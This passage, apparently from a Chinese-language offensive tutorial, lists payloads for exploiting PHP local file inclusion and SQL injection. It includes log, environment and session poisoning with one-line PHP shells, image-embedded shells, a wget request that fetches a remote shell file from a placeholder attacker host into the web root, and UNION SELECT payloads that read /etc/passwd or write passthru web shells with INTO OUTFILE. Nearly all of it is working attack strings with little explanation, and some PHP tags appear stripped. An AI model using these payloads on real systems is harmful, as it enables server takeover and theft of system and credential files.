如果不成功,把<?转为16进制 。
不行的话还可以把段字符放在header字段里面,比如说User-Agent、Referer
利用方式2:通过环境变量进行插入
/proc/self 指向最后一个PID使用的链接。
/proc/self/environ 是一个已知的路径,但是一般用户没权限读取。
在linux系统中,/proc/self是因为是个能写的环境变量,而且位置是固定的。
利用的话先把利用代码放在User-Agent进行提交,
然后请求:http://host/?file=../../../proc/self/environ&cmd=uname -a
利用方式3:将代码插入到图片中
讲一句话添加到图片中,然后上传直接利用。
http://host/?file=path/avatar.gif&cmd=uname -a
利用方式4:将代码插入到session文件中
如果是通过session验证的,并且知道session的字段。
http://host/?user= passthru($_GET[cmd]) ?>
找session值(浏览器)和文件位置(一般/tmp/session值)。
然后直接包含。
利用方式5: 其他文件
其他日志,FTP的话提交用户名为 passthru($_GET[cmd]) ?>
服务器版本较老的话,可以利用PUT方式提交代码。
利用方式6:获取shell
http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php
3、注入与文件包含
方式1:注入读取关键文件
http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);
magic_quotes开启的话
http://host/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);
方式2:先导出然后读取
http://host/?id=1 outfile “/tmp/sql.txt”
http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);
方式3:直接生成一句话
http://host/?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”
http://host/?id=-1 union select 1,”<?phpinfo ()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”
如果目录不能写,可以先导出到tmp
http://host/?id=-1 union select 1,” passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”